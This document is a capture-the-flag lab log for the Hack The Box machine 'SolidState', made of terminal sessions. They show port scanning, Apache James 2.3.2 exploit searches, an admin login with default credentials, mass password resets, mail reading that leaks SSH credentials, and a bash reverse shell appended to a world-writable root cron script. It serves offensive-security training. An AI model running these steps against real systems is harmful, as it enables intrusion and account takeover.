CrazyInSide:~/HackTheBox$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.51[sudo] crazyinside 的密码：Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-30 06:04:41 GMTInitiating SYN Stealth ScanScanning 1 hosts [131070 ports/host]Discovered open port 4555/tcp on 10.10.10.51                                   Discovered open port 22/tcp on 10.10.10.51                                     Discovered open port 110/tcp on 10.10.10.51                                    Discovered open port 25/tcp on 10.10.10.51                                     Discovered open port 119/tcp on 10.10.10.51                                    Discovered open port 80/tcp on 10.10.10.51     CrazyInSide:~/HackTheBox$ cat SolidState # Nmap 7.92SVN scan initiated Tue Aug 30 14:08:28 2022 as: nmap -sC -sV -p4555,22,110,25,119,80 -oN SolidState 10.10.10.51Nmap scan report for 10.10.10.51Host is up (0.16s latency).PORT     STATE SERVICE VERSION22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)| ssh-hostkey: |   2048 770084f578b9c7d354cf712e0d526d8b (RSA)|   256 78b83af660190691f553921d3f48ed53 (ECDSA)|_  256 e445e9ed074d7369435a12709dc4af76 (ED25519)25/tcp   open  smtp    JAMES smtpd 2.3.2|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.16.4 [10.10.16.4])80/tcp   open  http    Apache httpd 2.4.25 ((Debian))|_http-title: Home - Solid State Security|_http-server-header: Apache/2.4.25 (Debian)110/tcp  open  pop3    JAMES pop3d 2.3.2|_tls-alpn: ERROR: Script execution failed (use -d to debug)|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)|_sslv2: ERROR: Script execution failed (use -d to debug)|_ssl-cert: ERROR: Script execution failed (use -d to debug)|_ssl-date: ERROR: Script execution failed (use -d to debug)119/tcp  open  nntp    JAMES nntpd (posting ok)|_ssl-date: ERROR: Script execution failed (use -d to debug)|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)|_ssl-cert: ERROR: Script execution failed (use -d to debug)|_sslv2: ERROR: Script execution failed (use -d to debug)|_tls-alpn: ERROR: Script execution failed (use -d to debug)4555/tcp open  rsip?| fingerprint-strings: |   GenericLines: |     JAMES Remote Administration Tool 2.3.2|     Please enter your login and password|     Login id:|     Password:|     Login failed for |_    Login id:1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://ParrotOS.org/cgi-bin/submit.cgi?new-service :SF-Port4555-TCP:V=7.92SVN%I=7%D=8/30%Time=630DA969%P=x86_64-unknown-linux-SF:gnu%r(GenericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.SF:3\.2\nPlease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:SF:\nPassword:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .# Nmap done at Tue Aug 30 14:12:35 2022 -- 1 IP address (1 host up) scanned in 246.92 seconds

CrazyInSide:~/HackTheBox$ searchsploit JAMES            ------------------------------------------------------------------------------------------------------ --------------------------------- Exploit Title                                                                                        |  Path------------------------------------------------------------------------------------------------------ ---------------------------------Apache James Server 2.2 - SMTP Denial of Service                                                      | multiple/dos/27915.plApache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)                  | linux/remote/48130.rbApache James Server 2.3.2 - Remote Command Execution                                                  | linux/remote/35513.pyApache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)                        | linux/remote/50347.pyWheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow                                   | windows/remote/944.c------------------------------------------------------------------------------------------------------ ---------------------------------Shellcodes: No Results------------------------------------------------------------------------------------------------------ --------------------------------- Paper Title                                                                                          |  Path------------------------------------------------------------------------------------------------------ ---------------------------------Exploiting Apache James Server 2.3.2                                                                  | docs/english/40123-exploiting-ap------------------------------------------------------------------------------------------------------ ---------------------------------

msf6 > search Apache JamesMatching Modules================   #  Name                                      Disclosure Date  Rank    Check  Description   -  ----                                      ---------------  ----    -----  -----------   0  exploit/linux/smtp/apache_james_exec      2015-10-01       normal  Yes    Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write   1  auxiliary/scanner/http/log4shell_scanner  2021-12-09       normal  No     Log4Shell HTTP ScannerInteract with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/http/log4shell_scannermsf6 > use 0[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcpmsf6 exploit(linux/smtp/apache_james_exec) > show options Module options (exploit/linux/smtp/apache_james_exec):   Name       Current Setting  Required  Description   ----       ---------------  --------  -----------   ADMINPORT  4555             yes       Port for James remote administration tool   PASSWORD   root             yes       Root password for James remote administration tool   POP3PORT   110              no        Port for POP3 Apache James Service   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit   RPORT      25               yes       The target port (TCP)   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machin                                         e or 0.0.0.0 to listen on all addresses.   SRVPORT    8080             yes       The local port to listen on.   SSL        false            no        Negotiate SSL for incoming connections   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)   URIPATH                     no        The URI to use for this exploit (default is random)   USERNAME   root             yes       Root username for James remote administration toolPayload options (linux/x64/meterpreter/reverse_tcp):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   LHOST  192.168.1.3      yes       The listen address (an interface may be specified)   LPORT  4444             yes       The listen portExploit target:   Id  Name   --  ----   1   Cronmsf6 exploit(linux/smtp/apache_james_exec) > 

msf6 exploit(linux/smtp/apache_james_exec) > run[*] Started reverse TCP handler on 10.10.16.4:4444 [*] 10.10.10.51:25 - Command Stager progress - 100.00% done (833/833 bytes)[*] 10.10.10.51:25 - Waiting for cron to execute payload...[*] Exploit completed, but no session was created.msf6 exploit(linux/smtp/apache_james_exec) > 

CrazyInSide:~/HackTheBox$ nc 10.10.10.51 4555     JAMES Remote Administration Tool 2.3.2Please enter your login and passwordLogin id:rootPassword:rootWelcome root. HELP for a list of commandshelpCurrently implemented commands:help                                    display this helplistusers                               display existing accountscountusers                              display the number of existing accountsadduser [username] [password]           add a new userverify [username]                       verify if specified user existdeluser [username]                      delete existing usersetpassword [username] [password]       sets a user's passwordsetalias [user] [alias]                 locally forwards all email for 'user' to 'alias'showalias [username]                    shows a user's current email aliasunsetalias [user]                       unsets an alias for 'user'setforwarding [username] [emailaddress] forwards a user's email to another email addressshowforwarding [username]               shows a user's current email forwardingunsetforwarding [username]              removes a forwarduser [repositoryname]                   change to another user repositoryshutdown                                kills the current JVM (convenient when James is run as a daemon)quit                                    close connection

listusersExisting accounts 6user: jamesuser: ../../../../../../../../etc/bash_completion.duser: thomasuser: johnuser: mindyuser: mailadmin

setpassword james crazyinsidePassword for james resetsetpassword thomas crazyinsidePassword for thomas resetsetpassword john crazyinsidePassword for john resetsetpassword mindy crazyinsidePassword for mindy resetsetpassword mailadmin crazyinsidePassword for mailadmin reset

CrazyInSide:~/HackTheBox$ telnet 10.10.10.51 110Trying 10.10.10.51...Connected to 10.10.10.51.Escape character is '^]'.+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready USER mindy+OKPASS crazyinside+OK Welcome mindyLIST+OK 2 19451 11092 836.RETR 1+OK Message followsReturn-Path: <mailadmin@localhost>Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>MIME-Version: 1.0Content-Type: text/plain; charset=us-asciiContent-Transfer-Encoding: 7bitDelivered-To: mindy@localhostReceived: from 192.168.11.142 ([192.168.11.142])          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798          for <mindy@localhost>;          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)From: mailadmin@localhostSubject: WelcomeDear Mindy,Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.We are looking forward to you joining our team and your success at Solid State Security. Respectfully,James.RETR 2+OK Message followsReturn-Path: <mailadmin@localhost>Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>MIME-Version: 1.0Content-Type: text/plain; charset=us-asciiContent-Transfer-Encoding: 7bitDelivered-To: mindy@localhostReceived: from 192.168.11.142 ([192.168.11.142])          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581          for <mindy@localhost>;          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)From: mailadmin@localhostSubject: Your AccessDear Mindy,Here are your ssh credentials to access the system. Remember to reset your password after your first login. Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. username: mindypass: P@55W0rd1!2@Respectfully,James.

Message-ID: <8375593.0.1661772097524.JavaMail.root@solidstate>MIME-Version: 1.0Content-Type: text/plain; charset=us-asciiContent-Transfer-Encoding: 7bitDelivered-To: ../../../../../../../../etc/bash_completion.d@localhostReceived: from 10.10.14.18 ([10.10.14.18])          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 632          for <../../../../../../../../etc/bash_completion.d@localhost>;          Mon, 29 Aug 2022 07:20:57 -0400 (EDT)Date: Mon, 29 Aug 2022 07:20:57 -0400 (EDT)From: team@team.pl: No such file or directory-rbash: $'\r': command not foundmindy@solidstate:~$ 

CrazyInSide:~/HackTheBox$ sshpass -p 'P@55W0rd1!2@' ssh mindy@10.10.10.51 -t bash${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ lsbin  user.txt${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ iduid=1001(mindy) gid=1001(mindy) groups=1001(mindy)${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt 839631b6a847fb2415f9764adb415a7b${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ 

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ lsjames-2.3.2  tmp.py${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py #!/usr/bin/env pythonimport osimport systry:     os.system('nc 10.10.14.18 4242')except:     sys.exit()${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -all tmp.py -rwxrwxrwx 1 root root 111 Aug 29 09:35 tmp.py${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ 

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ echo "os.system('bash -c \"bash -i >& /dev/tcp/10.10.16.4/1337 0>&1\"')">>tmp.py ${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py #!/usr/bin/env pythonimport osimport systry:     os.system('nc 10.10.14.18 4242')except:     sys.exit()os.system('bash -c "bash -i >& /dev/tcp/10.10.16.4/1337 0>&1"')

CrazyInSide:~/HackTheBox$ nc -lvnp 1337           listening on [any] 1337 ...connect to [10.10.16.4] from (UNKNOWN) [10.10.10.51] 57460bash: cannot set terminal process group (6567): Inappropriate ioctl for devicebash: no job control in this shellroot@solidstate:~# lslsroot.txtroot@solidstate:~# cat root.txtcat root.txtad68d5.............................root@solidstate:~#